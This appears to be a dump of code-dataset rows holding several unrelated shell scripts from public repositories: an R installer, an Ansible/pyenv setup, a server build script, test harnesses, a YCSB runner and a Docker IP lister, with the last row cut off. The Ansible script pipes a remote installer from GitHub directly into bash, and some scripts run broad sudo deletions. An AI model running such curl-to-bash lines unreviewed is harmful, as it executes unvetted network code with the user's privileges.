blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
fe47a0070a9f9ad6b35de215dcdfc10c9cb6f4e6
|
Shell
|
fuzziebrain/docker-apex-stack
|
/oml-kit/installR.sh
|
UTF-8
| 584
| 2.71875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Run as root
# Install R 3.3.0 from the Oracle Linux 7 yum repos and point its default
# CRAN mirror at ${CRAN_MIRROR_URL} (overridable from the environment).
CRAN_MIRROR_URL=${CRAN_MIRROR_URL:-https://cran.r-project.org}
R_HOME=/usr/lib64/R
# Extra OL7 repos that carry the R rpm and its build dependencies.
yum-config-manager --enable ol7_optional_latest ol7_addons
yum install -y \
make \
automake \
gcc \
gcc-c++ \
pango-devel \
libXt-devel \
libpng12 \
unzip \
R-3.3.0-2.el7
# Drop the yum cache to keep the image small.
rm -rf /var/cache/yum
# Recreate the html doc dir for the installed R version.
# NOTE(review): presumably something later expects this path — confirm; also
# `mkdir` (no -p) fails if intermediate dirs are missing.
mkdir /usr/share/doc/R-$(rpm -q R.x86_64 --queryformat '%{VERSION}')/html
# Unquoted heredoc: ${CRAN_MIRROR_URL} is expanded by the shell here; the
# rest of the body is literal R code written to Rprofile.site.
cat << EOF > $R_HOME/etc/Rprofile.site
local({
r <- getOption("repos")
r["CRAN"] <- "${CRAN_MIRROR_URL}"
options(repos = r)
})
EOF
# Clean up JVM perf data left behind by earlier tooling, if any.
rm -rf /tmp/hsperfdata_root
| true
|
3b234e86b4f3c88240833b59321775948d1d1c47
|
Shell
|
simple-linux-tools/file-manipulation-scripts
|
/find-last-modified
|
UTF-8
| 202
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
#
# USAGE: find-last-modified [<location>] [<number of last modified files>]
# Print the N most recently modified files (default 30) under <location>
# (default: current directory), newest first.
# -print0 / xargs -0 keep filenames containing spaces intact; note that
# filenames containing newlines would still confuse the line-based sort.
find "${1:-.}" -type f -print0 2> /dev/null | xargs -0 stat --format '%Y :%y %n' | sort -nr | cut -d: -f2- | head -n "${2:-30}"
| true
|
7b1745f3ea2503eb4749fded47a3ad04e004cbd6
|
Shell
|
samuel-messing/otto
|
/src/build_and_run.sh
|
UTF-8
| 3,187
| 4.03125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Abort on the first failing command.
set -e
# Builds entire project and runs the server.
# TODO - check that we're running in top-level dir.
# TODO - kill existing server first.
# install_command <binary> <apt-package>
# Install <apt-package> via apt-get unless <binary> is already on PATH.
# $1 is quoted to avoid word-splitting/globbing; $2 is left unquoted so a
# caller could pass several package names in one argument.
function install_command() {
if ! command -v "$1" > /dev/null; then
echo "[one-time] Installing $1";
sudo apt-get install $2
fi
}
# One-time toolchain bootstrap: formatter, proto compiler, virtualenv.
install_command 'clang-format' 'clang-format'
install_command 'protoc' 'protobuf-compiler'
install_command 'virtualenv' 'virtualenv'
# make_dir <path>
# Create <path> (announcing it) unless the directory already exists.
# Quotes around "$1" prevent word-splitting/globbing on odd names.
function make_dir() {
if [[ ! -d "$1" ]]; then
echo "[one-time] Creating local $1/ directory";
mkdir "$1"
fi
}
# One-time local directories for the sqlite db and logs.
make_dir 'db'
make_dir 'logs'
readonly REPO_LOCATION="/home/pi/otto"
readonly ROOT="src"
readonly CONFIGS_ROOT="configs"
readonly DB_ROOT="db"
readonly GENFILES_ROOT="${ROOT}/genfiles"
readonly VIRTUALENV_ROOT="otto-env"
# Fixed-width status labels so the "...done!" suffixes line up.
# (fixed typo: "virutalenv" -> "virtualenv", same width)
readonly CLEANING__________="Cleaning................."
readonly SOURCE_VIRTUALENV_="Sourcing virtualenv......"
readonly INSTALL_VIRTUALENV="Installing virtualenv...."
readonly FORMAT_PYTHON_____="Formatting python........"
readonly FORMAT_PROTOS_____="Formatting protos........"
readonly BUILD_PROTOS______="Building protos.........."
readonly START_SERVER______="Starting server.........."
readonly EXIT_VIRTUALENV___="Exiting virtualenv......."
readonly DONE="...done!"
# DEFAULTS ===========================================
readonly DEFAULT_CONFIG="${CONFIGS_ROOT}/p0_v5.pbtxt"
readonly DEFAULT_DB_PATH="${DB_ROOT}/otto.db"
readonly DEFAULT_LOGGING_CONFIG="${CONFIGS_ROOT}/p0_v0.logging.config"
# HACK: To install as a systemd service, ensure we're running in the repo.
pushd "${REPO_LOCATION}"
# CLEANING ===========================================
echo -n "${CLEANING__________}"
# The glob must sit OUTSIDE the quotes: the original "${GENFILES_ROOT}/*"
# quoted the '*', so rm looked for a file literally named '*' and the
# generated files were never actually cleaned.
rm -f "${GENFILES_ROOT}"/*
rm -f "${ROOT}"/*.pyc
touch "${GENFILES_ROOT}/__init__.py"
echo "${DONE}"
# VIRTUALENV =========================================
# Bootstrap the virtualenv and its requirements on first run only.
if [ ! -d "${VIRTUALENV_ROOT}" ]; then
echo "No virtualenv found at ${VIRTUALENV_ROOT}!"
echo "${INSTALL_VIRTUALENV}"
virtualenv -p python3 otto-env
# activate is idempotent
. otto-env/bin/activate
pip install -r "${ROOT}/requirements.txt"
echo "${DONE}"
fi
# EXIT trap handler: announce shutdown, leave the virtualenv (deactivate is
# defined by otto-env/bin/activate, sourced earlier), and sign off.
function finish {
echo "Server killed!"
echo -n "${EXIT_VIRTUALENV___}"
deactivate
echo "${DONE}"
echo "\"This is Otto, signing off!\" ~ Otto"
}
# Always run the cleanup handler, even if set -e aborts us mid-way.
trap finish EXIT
echo -n "${SOURCE_VIRTUALENV_}"
# activate is idempotent
. otto-env/bin/activate
#pip install -r "${ROOT}/requirements.txt"
echo "${DONE}"
# FORMATTING CODE ====================================
# NOTE(review): the '.' in `grep .py` is an unescaped regex dot, so this
# matches any changed file whose name contains "<any-char>py", not only
# *.py files — confirm whether that is intended.
if [[ ! -z "$(git diff --name-only | grep .py)" ]]; then
echo -n "${FORMAT_PYTHON_____}"
autopep8 --in-place --recursive src/
echo "${DONE}"
fi
if [[ ! -z "$(git diff --name-only | grep .proto)" ]]; then
echo -n "${FORMAT_PROTOS_____}"
clang-format -i src/proto/*
echo "${DONE}"
fi
# BUILDING PROTOS ====================================
# Generate python stubs for every proto into src/genfiles/.
echo -n "${BUILD_PROTOS______}"
protoc -I="${ROOT}/proto/" \
--python_out="${ROOT}/genfiles/" \
${ROOT}/proto/*
echo "${DONE}"
# RUNNING SERVER =====================================
# Run the server with the generated stubs importable via PYTHONPATH.
echo "${START_SERVER______}"
PYTHONPATH="${GENFILES_ROOT}" python3 ${ROOT}/app.py \
--config_file="${DEFAULT_CONFIG}" \
--db_file="${DEFAULT_DB_PATH}" \
--logging_config_file="${DEFAULT_LOGGING_CONFIG}"
| true
|
a110aa043ed2f0460aca8d141faf8454894f418f
|
Shell
|
CSenshi/Information-Theory-Checker
|
/HW3/script/check.sh
|
UTF-8
| 5,447
| 3.859375
| 4
|
[] |
no_license
|
#!/bin/bash
# Argument-count gate: flags arrive as flag/value pairs, so only the even
# counts 8/10/12/14 are acceptable. (Original shebang had a stray space,
# "# !/bin/bash", which demoted it to a plain comment.)
if [ "$#" -ne 8 ] && [ "$#" -ne 10 ] && [ "$#" -ne 12 ] && [ "$#" -ne 14 ] ; then
echo "Invalid Arguments"
echo "Usage: script requires 3-5 Arguments: "
echo " -s Path to folder which contains following scripts with exact names:"
echo " StandardForm.XXX, ParityCheck.XXX, DecodingTable.XXX, Encode.XXX Decode.xxx"
echo " -t Path to folder which contains public tests(where A,B,C,D folders are located)"
echo " -T Path to folder which contains test scriptis (i.e. test_C.py, test_d.py"
echo " -r Path to folder where we should put output for each test"
echo " -e Extension of your file (pass with dot exaple: .py)"
echo " -i Your Interpreter (If using executable)"
echo " -py3 Your Python Interpreter (Used to test C and D)"
echo "Example: /check.sh -s src/ -t public_tests/ -r res/ -e .py -i python3 -T script/"
# Exit non-zero so callers can detect invalid usage.
exit 1
fi
# Read Command Line Arguments
# Flag/value pairs: -s script dir, -t test dir, -T tester-script dir,
# -r result dir, -e file extension, -i interpreter, -py3 python3 interpreter.
# Unknown tokens are stashed in POSITIONAL and restored afterwards.
POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"
case $key in
-s)
SCRIPT_FOLDER_PATH="$2"
shift # past argument
shift # past value
;;
-t)
TEST_FOLDER_PATH="$2"
shift # past argument
shift # past value
;;
-T)
TESTER_SCRIPT_FOLDER="$2"
shift # past argument
shift # past value
;;
-r)
RESULT_DIR_NAME="$2"
shift # past argument
shift # past value
;;
-e)
EXTENSION="$2"
shift # past argument
shift # past value
;;
-i)
INTERPRETER="$2"
shift # past argument
shift # past value
;;
# NOTE: the python-interpreter flag accepted here is -py3.
-py3)
PYTHON3="$2"
shift # past argument
shift # past value
;;
*) # unknown option
POSITIONAL+=("$1") # save it in an array for later
shift # past argument
;;
esac
done
set -- "${POSITIONAL[@]}" # restore positional parameters
# Required-argument validation: bail out early, pointing at the flag to use.
[ -z "$SCRIPT_FOLDER_PATH" ] && printf "Script Folder path shouldn't be empty (use -s) \nexiting...\n" && exit
echo "Script Folder path: $(pwd)/${SCRIPT_FOLDER_PATH}"
[ -z "$TEST_FOLDER_PATH" ] && printf "Test Folders path shouldn't be empty (use -t) \nexiting...\n" && exit
echo "Test Folders path: $(pwd)/${TEST_FOLDER_PATH}"
# (fixed: this message previously said "use -s" for the -r flag)
[ -z "$RESULT_DIR_NAME" ] && printf "Result Directory Path shouldn't be empty (use -r) \nexiting...\n" && exit
echo "Result Directory Path: $(pwd)/${RESULT_DIR_NAME}"
echo "Extension: ${EXTENSION}"
echo "Interpreter: ${INTERPRETER}"
# Create the result dir if it is missing (the old comment claimed it was
# deleted; the code only ever creates it).
if [ ! -d "${RESULT_DIR_NAME}" ]; then
mkdir "${RESULT_DIR_NAME}"
fi
echo
echo "Starting Tests..."
UTILS='../utils'
# Thin wrapper: forward the four per-test parameters, followed by the global
# configuration, to the generic compare-based test runner script.
run_test_compare(){
    local problem="$1" program="$2" sub_folder="$3" total="$4"
    "${UTILS}/run_test_compare.sh" \
        "$problem" "$program" "$sub_folder" "$total" \
        "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}"
}
# Wrapper: run tests whose output is validated by a python checker script
# (test_A.py / test_B.py), executed with $PYTHON3 from $TESTER_SCRIPT_FOLDER.
run_test_with_checkers(){
RUN_TEST="${UTILS}/run_test_with_checkers.sh"
PROBLEM_NAME="$1"
PROGRAM_NAME="$2"
TEST_SUB_FOLDER="$3"
TOTAL_TEST="$4"
PYTHON_TEST="$5"
$RUN_TEST "${PROBLEM_NAME}" "${PROGRAM_NAME}" "${TEST_SUB_FOLDER}" "${TOTAL_TEST}" "${PYTHON_TEST}" "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}" "${TESTER_SCRIPT_FOLDER}" "${PYTHON3}"
}
# Wrapper: run tests whose program takes two input files, identified by the
# two extra extension arguments ($5/$6), and compare output with expected.
run_test_compare_2args(){
RUN_TEST="${UTILS}/run_test_compare_2args.sh"
PROBLEM_NAME="$1"
PROGRAM_NAME="$2"
TEST_SUB_FOLDER="$3"
TOTAL_TEST="$4"
ARG1_FILE_EXTENSION="$5"
ARG2_FILE_EXTENSION="$6"
$RUN_TEST "${PROBLEM_NAME}" "${PROGRAM_NAME}" "${TEST_SUB_FOLDER}" "${TOTAL_TEST}" "${ARG1_FILE_EXTENSION}" "${ARG2_FILE_EXTENSION}" "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}"
}
# Wrapper: run tests and only record output, without comparing to expected.
run_test_without_compare(){
RUN_TEST="${UTILS}/run_test_without_compare.sh"
PROBLEM_NAME="$1"
PROGRAM_NAME="$2"
TEST_SUB_FOLDER="$3"
TOTAL_TEST="$4"
$RUN_TEST "${PROBLEM_NAME}" "${PROGRAM_NAME}" "${TEST_SUB_FOLDER}" "${TOTAL_TEST}" "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}"
}
# Wrapper: run tests with a second input taken from a previously generated
# directory ($5, produced by the DecodingTable run).
run_test_with_2input(){
RUN_TEST="${UTILS}/run_test_with_2input.sh"
PROBLEM_NAME="$1"
PROGRAM_NAME="$2"
TEST_SUB_FOLDER="$3"
TOTAL_TEST="$4"
GENERATED_CODE_DIR_NAME="$5"
$RUN_TEST "${PROBLEM_NAME}" "${PROGRAM_NAME}" "${TEST_SUB_FOLDER}" "${TOTAL_TEST}" "${GENERATED_CODE_DIR_NAME}" "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}"
}
# Build the path of DecodingTable's generated-output folder; the Decode ("E")
# run below consumes it as its extra input directory.
TEST_SUB_FOLD="C"
RES_DIR=${RESULT_DIR_NAME}/${TEST_SUB_FOLD}/
PROG_NAME="DecodingTable${EXTENSION}"
SCRIPT=${SCRIPT_FOLDER_PATH}/${PROG_NAME}
# Strip the extension, then the leading directories -> bare program name.
FNAME=${SCRIPT%.*}
FNAME=${FNAME##*/}
GENERATED_CODE_DIR_NAME=${RES_DIR}/${FNAME}_
# Run the five problems; the numeric argument is presumably the test count
# per problem — TODO confirm against the runner scripts.
run_test_with_checkers "StandardForm" "StandardForm${EXTENSION}" "A" 8 "test_A.py"
run_test_with_checkers "ParityCheck" "ParityCheck${EXTENSION}" "B" 8 "test_B.py"
run_test_compare_2args "Encode" "Encode${EXTENSION}" "D" 6 "code" "dat"
run_test_without_compare "DecodingTable" "DecodingTable${EXTENSION}" "C" 6
# NOTE(review): ${GENERATED_CODE_DIR_NAME} is unquoted here, unlike every
# other argument — it would word-split if RESULT_DIR_NAME contains spaces.
run_test_with_2input "Decode" "Decode${EXTENSION}" "E" 6 ${GENERATED_CODE_DIR_NAME}
| true
|
ba87b4cce91bd25efebd915e66ead9a082473784
|
Shell
|
weiyaom/BigDataGroupProjects
|
/Java_Kafka/installKafka.sh
|
UTF-8
| 403
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/sh
# Download Kafka 2.12-2.3.1 into /opt and register KAFKA_HOME/PATH
# in the user's ~/.bash_profile.
cd /opt
#Get Kafka
sudo wget http://apache.mirrors.hoobly.com/kafka/2.3.1/kafka_2.12-2.3.1.tgz
#Extract the file
sudo tar -xzvf kafka_2.12-2.3.1.tgz
#Remove zip file
sudo rm kafka_2.12-2.3.1.tgz
#Update the bash profile
# NOTE(review): `echo -e` is a bashism; under a strict /bin/sh (e.g. dash)
# it may print a literal "-e" — confirm the shell this actually runs under.
echo -e '\n#Kafka Home' >> ~/.bash_profile
echo 'export KAFKA_HOME=/opt/kafka_2.12-2.3.1' >> ~/.bash_profile
echo 'export PATH=$PATH:$KAFKA_HOME/bin' >> ~/.bash_profile
| true
|
9de31959681931ba5e89636da1243c1b954766ca
|
Shell
|
jeanregisser/dotfiles
|
/bin/install-nodes
|
UTF-8
| 220
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
# Install a fixed set of node.js versions via nvm.
# `msg` is presumably defined by script-helpers — confirm there.
source "$(dirname "$0")/script-helpers"
msg "Install node.js versions"
# Versions to install, oldest first.
NODES=(
'v6.9.1'
'v7.5.0'
'v8.2.1'
)
for item in "${NODES[@]}"
do
nvm install $item
done
#nvm alias default node
| true
|
61904f32a6b0d1c729fc6015a6e8856db8d5508c
|
Shell
|
l50/bash-scripts
|
/install_ansible.sh
|
UTF-8
| 7,280
| 3.640625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# -----------------------------------------------------------------------------
# install_ansible.sh
#
# Install ansible
#
# Usage: bash install_ansible.sh
#
# Author: Jayson Grace, jayson.e.grace@gmail.com, 8/2/2017
#
# Resources:
# https://stackoverflow.com/questions/19622198/what-does-set-e-mean-in-a-bash-script/34381499
# http://binarynature.blogspot.com.au/2016/01/install-ansible-on-os-x-el-capitan_30.html
# http://ansible.pickle.io/post/86598332429/running-ansible-playbook-in-localhost
# https://unix.stackexchange.com/questions/306111/confused-about-operators-vs-vs-vs
# https://unix.stackexchange.com/questions/32210/single-or-double-brackets
# https://github.com/g0tmi1k/os-scripts/blob/master/kali-rolling.sh
# ----------------------------------------------------------------------------
# Stop execution of script if an error occurs
set -e
# os is filled in later by installPyenvDeps (from /etc/os-release on Linux).
os=''
# Layout of the system-wide ansible installation.
ansible_directory='/etc/ansible'
ansible_config_file="$ansible_directory/ansible.cfg"
ansible_hosts="$ansible_directory/hosts"
global_roles="$ansible_directory/roles"
ansible_workspace="$HOME/.ansible/Workspace"
# Flipped to false by install_pyenv on a fresh install; get_pip uses it to
# decide whether pip still needs bootstrapping.
pyenv_installed=true
python_version='3.6.5'
##### (Cosmetic) Color output
RED="\033[01;31m" # Issues/Errors
GREEN="\033[01;32m" # Success
BLUE="\033[01;34m" # Heading
RESET="\033[00m" # Normal
# Refresh apt metadata and install the packages pyenv needs to build CPython
# (compilers plus ssl/bz2/sqlite/readline/ncurses headers, etc.).
install_apt_deps()
{
echo -e "${BLUE}Making sure all apt dependencies are in place, please wait...${RESET}"
sudo apt update
sudo DEBIAN_FRONTEND=noninteractive apt install -y git build-essential libssl-dev libbz2-dev make zlib1g-dev \
libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev \
tk-dev xz-utils
}
# On non-macOS hosts, detect the distro from /etc/os-release and pull in the
# apt build dependencies on Ubuntu/Kali. Sets the global `os`.
installPyenvDeps()
{
if [[ $(uname) != 'Darwin' ]]; then
os=$(perl -n -e'while(/^ID=(.*)/g) {print "$1\n"}' /etc/os-release)
if [[ $os == 'ubuntu' || $os == 'kali' ]]; then
install_apt_deps
fi
fi
}
# Pick the shell dotfile matching $SHELL and append the pyenv PATH/init
# lines to it (idempotent: skipped if the PATH line is already present).
# An unsupported shell only prints a warning — it does not abort.
setDotfileParams()
{
dotfile=''
if [[ $(echo $SHELL) == '/bin/bash' ]]; then
dotfile="$HOME/.bash_profile"
echo "source $HOME/.bash_profile" >> "$HOME/.bashrc"
if [[ ! -f $dotfile ]]; then
touch $dotfile
fi
elif [[ $(echo $SHELL) == '/bin/zsh' ]]; then
dotfile="$HOME/.zshrc"
else
echo 'Unsupported shell detected, please use bash or zsh.'
fi
if [[ ! $dotfile == '' ]]; then
# Single quotes keep these lines literal so they expand at shell startup.
if ! grep -Fxq 'export PATH=$PATH:$HOME/.pyenv/bin' "$dotfile"; then
echo -e "${BLUE}${dotfile} does not have pyenv vars, setting it up...${RESET}"
echo 'export PATH=$PATH:$HOME/.pyenv/bin' >> $dotfile
echo 'eval "$(pyenv init -)"' >> $dotfile
echo 'eval "$(pyenv virtualenv-init -)"' >> $dotfile
fi
fi
}
# Install pyenv via the upstream installer unless ~/.pyenv already exists.
# On a fresh install, flips the global pyenv_installed to false (read later
# by get_pip) and wires pyenv into the user's dotfile.
install_pyenv()
{
installPyenvDeps
if [[ ! -d $HOME/.pyenv ]]; then
pyenv_installed=false
echo -e "${BLUE}Installing pyenv, please wait...${RESET}"
# NOTE(review): piping curl straight into bash runs unreviewed remote code.
curl https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv-installer | bash
setDotfileParams
else
echo -e "${GREEN}pyenv has already been installed, moving on...${RESET}"
fi
}
# Build $python_version with pyenv (if not already present), make it the
# global pyenv version, and symlink it to /usr/bin/python if none exists.
install_python()
{
echo -e "${BLUE}Installing python ${python_version} and setting it globally using pyenv, please wait...${RESET}"
if [[ ! -f $HOME/.pyenv/versions/$python_version/bin/python ]]; then
$HOME/.pyenv/bin/pyenv install $python_version
$HOME/.pyenv/bin/pyenv global $python_version
else
echo -e "${GREEN}Python version ${python_version} has already been installed, moving on...${RESET}"
fi
if [[ ! -f /usr/bin/python ]]; then
# Symlink to fix issues with ansible
sudo ln -s $HOME/.pyenv/versions/$python_version/bin/python /usr/bin/python
fi
}
# Bootstrap pip via easy_install only when pyenv was freshly installed in
# this run (pyenv_installed=false), then upgrade pip to the latest version.
get_pip()
{
if [[ $pyenv_installed == false ]]; then
echo -e "${BLUE}Installing pip, please wait...${RESET}"
$HOME/.pyenv/shims/easy_install pip
fi
echo -e "${BLUE}Making sure we are using the latest version of pip, please wait...${RESET}"
$HOME/.pyenv/versions/$python_version/bin/pip install --upgrade pip
}
# Install ansible with the pyenv-managed python's pip, so it lands under
# ~/.pyenv rather than in the system site-packages.
install_ansible()
{
echo -e "${BLUE}Installing ansible, please wait...${RESET}"
$HOME/.pyenv/versions/$python_version/bin/pip install ansible
}
# Create /etc/ansible and hand ownership to the invoking user so later
# steps can write the config without sudo.
create_ansible_directory()
{
if [[ ! -d $ansible_directory ]]; then
sudo mkdir $ansible_directory
# This will not work on docker by default because $USER is not defined - you need to define it as an ENV var
sudo chown $USER $ansible_directory
else
echo -e "${GREEN}Ansible directory already created, moving on...${RESET}"
fi
}
# Fetch the example ansible.cfg from upstream and pin the python
# interpreter to the pyenv-managed one.
# NOTE(review): the URL points at the `devel` branch — confirm the example
# config still exists there before relying on this.
get_ansible_config_file()
{
if [[ ! -f $ansible_config_file ]]; then
echo 'getting config file'
# The trailing backslash continues the line, so -o is part of this curl call.
curl https://raw.githubusercontent.com/ansible/ansible/devel/examples/ansible.cfg\
-o $ansible_config_file
sudo bash -c "echo ansible_python_interpreter = $HOME/.pyenv/versions/$python_version/bin/python >> $ansible_config_file"
else
echo -e "${GREEN}Ansible config file already created, moving on...${RESET}"
fi
}
# Uncomment the log_path setting in ansible.cfg so runs are logged to
# /var/log/ansible.log; sed keeps a .old backup of the original file.
# NOTE(review): GNU sed accepts -i".old"; BSD sed needs `-i .old` — confirm
# the target platforms if macOS is in scope.
modify_ansible_config_file()
{
if [[ -f $ansible_config_file ]]; then
echo 'Adding logging to ansible config file'
sed -i".old" 's/#log_path = \/var\/log\/ansible.log/log_path = \/var\/log\/ansible.log/' $ansible_config_file
else
echo -e "${RED}Unable to find ansible config file to modify, moving on...${RESET}"
fi
}
# Create the inventory file with a single localhost entry so playbooks run
# locally. `sudo tee` overwrites the file (the preceding touch is harmless).
create_host_file()
{
if [[ ! -f $ansible_hosts ]]; then
sudo touch $ansible_hosts
# Run playbooks locally
echo "localhost ansible_connection=local" | sudo tee $ansible_hosts
fi
}
# Smoke-test the install by pinging localhost with the ansible ping module.
# Running the command as an `if` condition keeps a failure from tripping
# the script-wide `set -e`.
check_ansible_installed()
{
if $HOME/.pyenv/versions/${python_version}/bin/ansible localhost -m ping > /dev/null; then
echo -e "${GREEN}Ansible was successfully installed!${RESET}"
else
echo -e "${RED}There was an issue installing ansible.${RESET}"
fi
}
# Ensure the per-user ansible workspace directory exists (idempotent).
create_ansible_workspace()
{
if [[ -d $ansible_workspace ]]; then
echo -e "${GREEN}Ansible workspace already created, moving on...${RESET}"
return
fi
echo -e "${BLUE}Creating ansible workspace at $ansible_workspace ${RESET}"
mkdir -p $ansible_workspace
}
# Create the shared roles dir and give /etc/ansible back to root (undoing
# the earlier chown once user-level writes are finished).
create_global_roles()
{
if [[ ! -d $global_roles ]]; then
echo -e "${BLUE}Creating global ansible roles directory${RESET}"
sudo mkdir $global_roles
sudo chown -R root $ansible_directory
# Ubuntu additionally gets the group reset; other distros keep theirs.
if [[ $os == 'ubuntu' ]]; then
sudo chgrp -R root $ansible_directory
fi
else
echo -e "${GREEN}Global Ansible roles directory already created, moving on...${RESET}"
fi
}
# Symlink every pyenv-installed ansible binary into /usr/local/bin.
setup_ansible_symlinks()
{
ansible_bins=('ansible' 'ansible-connection' 'ansible-console' 'ansible-doc' 'ansible-galaxy' 'ansible-playbook' 'ansible-pull' 'ansible-vault')
# If there's already an ansible in place, remove it
if [[ -f /usr/local/bin/ansible ]]; then
sudo rm -rf /usr/local/bin/ansible
fi
for ((i=0; i<${#ansible_bins[*]}; i++)); do
echo -e "${BLUE}Creating ${ansible_bins[i]} symlink${RESET}"
# -f replaces a pre-existing link: the block above only removed the bare
# `ansible` link, so on re-runs a plain `ln -s` failed with "File exists"
# on the other binaries and aborted the whole script under `set -e`.
sudo ln -sf $HOME/.pyenv/versions/${python_version}/bin/${ansible_bins[i]} /usr/local/bin/${ansible_bins[i]}
done
}
# Create the world-readable log file that ansible.cfg's log_path points at.
create_log_file()
{
echo -e "${BLUE}Creating log file at /var/log/ansible.log${RESET}"
sudo touch /var/log/ansible.log
sudo chmod 644 /var/log/ansible.log
}
# Main sequence. Order matters: python toolchain first (pyenv -> python ->
# pip -> ansible), then the /etc/ansible layout, symlinks, and log file.
install_pyenv
install_python
get_pip
install_ansible
create_ansible_directory
get_ansible_config_file
modify_ansible_config_file
create_host_file
check_ansible_installed
create_ansible_workspace
create_global_roles
setup_ansible_symlinks
create_log_file
| true
|
e83acf4553bd7e12bc30eef73c4f51d3fa07af0a
|
Shell
|
rohankadekodi/SplitFS
|
/scripts/ycsb/run_ycsb_soft.sh
|
UTF-8
| 715
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Drive YCSB LoadA/RunA workloads across several filesystem configurations.
# NOTE(review): src_dir and cur_dir appear unused in this script — confirm
# whether sourced/child scripts rely on them before removing.
src_dir=`readlink -f ../../`
cur_dir=`readlink -f ./`
setup_dir=`readlink -f ../configs`
# Emulated pmem mount; wiped between runs.
pmem_dir=/mnt/pmem_emul
# Run one LoadA + RunA YCSB cycle on the given filesystem configuration.
# $1 - filesystem/config name forwarded to run_fs_soft.sh
run_ycsb()
{
fs=$1
for run in 1
do
# ${pmem_dir:?} aborts instead of expanding to "/*" if pmem_dir is ever
# unset or empty, so this can never wipe the root filesystem.
sudo rm -rf "${pmem_dir:?}"/*
sudo taskset -c 0-7 ./run_fs_soft.sh LoadA $fs $run
sleep 5
sudo taskset -c 0-7 ./run_fs_soft.sh RunA $fs $run
sleep 5
done
}
# One pass per filesystem; each *_config.sh prepares /mnt/pmem_emul for
# that filesystem before the workload runs.
sudo $setup_dir/dax_config.sh
run_ycsb dax
sudo $setup_dir/nova_relaxed_config.sh
run_ycsb relaxed_nova
sudo $setup_dir/pmfs_config.sh
run_ycsb pmfs
sudo $setup_dir/nova_config.sh
run_ycsb nova
# The three boost variants all run on the plain DAX configuration.
sudo $setup_dir/dax_config.sh
run_ycsb boost
sudo $setup_dir/dax_config.sh
run_ycsb sync_boost
sudo $setup_dir/dax_config.sh
run_ycsb posix_boost
| true
|
582a050864181545603f79f47d0eddac14f9448e
|
Shell
|
skyformat99/quant
|
/notebook.sh
|
UTF-8
| 317
| 3.265625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Launch a background Jupyter notebook server from the script's directory,
# logging to logs/notebook.log. (Removed a duplicated shebang line.)
BASEDIR=`dirname $0`
cd "$BASEDIR"
if [[ ! -d research ]];then
mkdir research
fi
# The log dir must exist too: the nohup redirection below fails on a fresh
# checkout when logs/ is missing.
if [[ ! -d logs ]];then
mkdir logs
fi
# Refuse to start a second server. grep matches its own process in the ps
# output, hence the threshold of 1 rather than 0.
if [ `ps aux | grep jupyter | wc -l` -gt 1 ];then
echo "the notebook is already running,stop it first"
exit
fi
# Start the notebook server in the background.
nohup jupyter notebook --ip 0.0.0.0 > logs/notebook.log &
| true
|
272544631c401c74784f7bc0b64972cf29ea8a57
|
Shell
|
Irkka/squire
|
/lib/squire/ui/cli/usage.sh
|
UTF-8
| 300
| 2.921875
| 3
|
[] |
no_license
|
# NOTE(review): `require_relative` is not a shell builtin — presumably a
# helper provided by the surrounding squire framework that sources sibling
# files; confirm against meta.sh.
require_relative '../../meta.sh'
# Print the version banner (squire_version comes from meta.sh) followed by
# CLI usage, then return 1 so this doubles as an error-path helper.
function squire_usage() {
squire_version
cat <<USAGE
# To locate squire installation and load it up
eval \$(squire init)
# To install or uninstall local or global libraries
squire <install (-g)|uninstall (-g)>
USAGE
return 1
}
export -f squire_usage
| true
|
72c928800b5a5b07faa1a63b8571aa0872a7c92a
|
Shell
|
jwermuth/docker-mongo-cluster
|
/resolveips.sh
|
UTF-8
| 767
| 3.5
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# pipework is also great, but if you can use hostnames rather than IPs,
# this script can help. (This sentence was previously a bare, uncommented
# line, so the shell tried to execute it as a `pipework` command.)
# This function will list all ip of running containers
# Print "<ip> <container-name>" for every running container.
# $vm is now quoted in the inspect call so odd names don't word-split;
# note that parsing `docker ps` output is inherently fragile.
function listip {
for vm in $(docker ps | tail -n +2 | awk '{print $NF}');
do
ip=$(docker inspect --format '{{ .NetworkSettings.IPAddress }}' "$vm");
echo "$ip $vm";
done
}
# This function will copy hosts file to all running container /etc/hosts
# Pushes the locally generated /tmp/hosts into every running container;
# "$vm" is quoted so container names never word-split.
function updateip {
for vm in $(docker ps | tail -n +2 | awk '{print $NF}');
do
echo "copy hosts file to $vm";
docker exec -i "$vm" sh -c 'cat > /etc/hosts' < /tmp/hosts
done
}
# Default action: just print the ip/name table. Uncomment the lines below
# to capture it to /tmp/hosts and push it into the containers.
listip
#listip > /tmp/hosts
#updateip
| true
|
d2181b7c745e140d3fe77d8e57dc65648e964d2a
|
Shell
|
emersion/confiture.utils
|
/massctl.sh
|
UTF-8
| 2,995
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash
# Dependencies : -
APP_VERSION='0.1'
APP_AUTHOR='$imon'
# Mode flags, toggled by the CLI switches parsed below.
